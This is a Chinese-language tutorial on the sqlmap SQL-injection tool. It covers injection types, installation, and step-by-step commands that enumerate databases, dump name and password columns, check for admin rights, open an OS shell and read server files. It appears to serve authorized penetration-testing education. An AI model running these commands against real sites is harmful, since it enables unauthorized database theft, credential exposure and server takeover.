Sqlmap从入门到放弃 读这一篇就行了

本文将为你讲解SQLMap这个工具的详细使用和进阶玩法。sqlmap是一款自动化的SQL注入工具，其主要功能是扫描、发现并利用给定URL的SQL注入漏洞，内置了很多绕过插件，支持的数据库也比较多，如常见的MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、等。注：本文仅供学习和研究，请遵守相关法律法规。

🧺常见的Sql注入类型

• 基于布尔类型的盲注： 可以根据返回页面判断条件真假的注入。

• 基于时间的盲注: 不根据页面返回的内容判断任何信息，要用条件语句查看时间延迟语 句是否已执行(即页面返回时间是否增加)来判断。

• 基于报错注入： 页面会返回错误信息，或者把注入的语句的结果直接返回到页面中。（最常用的方法之一，我们只需要在url后面添加'号，如果报错，则说明存在注入。）

• 联合查询注入： 在可以使用Union的情况下的注入。

⛵含有sql注入漏洞的查找

相对而言，sql注入漏洞和之前相比。很明显数量上有所减少。但这并不意味着完全没有。因为没有一个系统是绝对安全的。最常用的方法便是利用各种web漏洞扫描工具去扫描。如nessus AVWS zap 等主流的工具都是可以检测到的。另位我们也可以手动去查找。如利用google语法去查找指定的网站。手动输入特定符号看是否有报错，从而来判断是否含有sql注入。

🍩Sqlmap的安装

在kali中sqlmap已经是默认安装的，其他系统安装也很简单。

apt-get install sqlmap #debian系列
yum install sqlmap #centos

🍓SqlMap入门

判断某个URL是否有注入点：

sqlmap -u https://bbskali.cn?id=1

当url后面的参数大于等于两个时，对url加""

sqlmap -u "https://bbskali.cn?id=1&uid=2"

基于POST/GET注入：

对于这种，我们就不能用上面的方法了。需要用burp对提交的请求进行抓包，并将其保存位txt文件。然后执行命令

sqlmap -r bbskali.txt

查询当前数据库

sqlmap -u https://bbskali.cn?id=1 --dbs

查询数据库中的表

-D指定数据库名

sqlmap -u https://bbskali.cn?id=1 -D KALI --tables

获取表中的字段名

-T 指定表名

sqlmap -u https://bbskali.cn?id=1 -D kali -T  user --columns

获取表中的字段内容-C 指定字段名，多个字段用,分开。

sqlmap -u https://bbskali.cn?id=1 -D kali -T  user -C "name,password" --dump

🍏Sqlmap参数讲解

--level需要执行的测试等级，一共有5个等级(1-5)，可不加level，默认是1。SQLMap使用的Payload可以在xml/payloads.xml中看到，也可以根据相应的格式添加自己的Payload，其中5级包含的Payload最多，会自动破解出cookie，XFF等头部注入。当然，level越高，运行速度也比较慢。

判断当前用户是否为管理权限，返回true则为是管理权限，否则不是

sqlmap  -u https://bbskali.cn?id=1 --is-dba

SQLMap可以在请求中伪造HTTP中的referer, 当-level参数设定为3或3以上时,会尝试对referer注入。可以使用referer命令来欺骗,如--referer http://bbskali.cn

利用此命令，我们可以给目标服务器写入相关的一句话shell。但是唯一的缺点就是你要知道站点的根目录。如phpstudy的目录D:phpstudy_proWWW使用命令如下：

sqlmap  -u https://bbskali.cn?id=1 --os-shell

利用此命令，我们可以从服务器中读取文件。但是也得要提前知道目录的位置。

sqlmap  -u https://bbskali.cn?id=1 --file-read "D:phpstudy_proWWWkali.txt" 

🍭总结

sqlmap是我们“渗透测试”中最常用的工具之一。自动化的注入让“肾透”更简单。当然，“肾透需授权，请勿非法肾透”